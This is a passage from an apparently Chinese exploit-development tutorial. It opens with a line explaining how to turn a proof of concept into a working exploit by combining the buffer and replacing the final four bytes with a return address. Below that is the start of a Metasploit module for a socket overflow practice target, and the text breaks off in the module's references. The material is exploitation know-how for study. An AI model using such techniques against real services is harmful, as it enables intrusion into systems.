poc代码如下,如果将下面代码改为exploit可将buf进行组合,同时修改最后4个字节的返回地址即可实现攻击的目的。
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remoteinclude Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'JYH Socket Overflow testing',
'Description' => %q{
this module is exploit practice
"Vulnerability Exploit and Analysis Technique"
},
'Author' => 'JYH',
'License' => MSF_LICENSE,
'Version' => '1.0',
'References' =>
[
[ 'CVE&#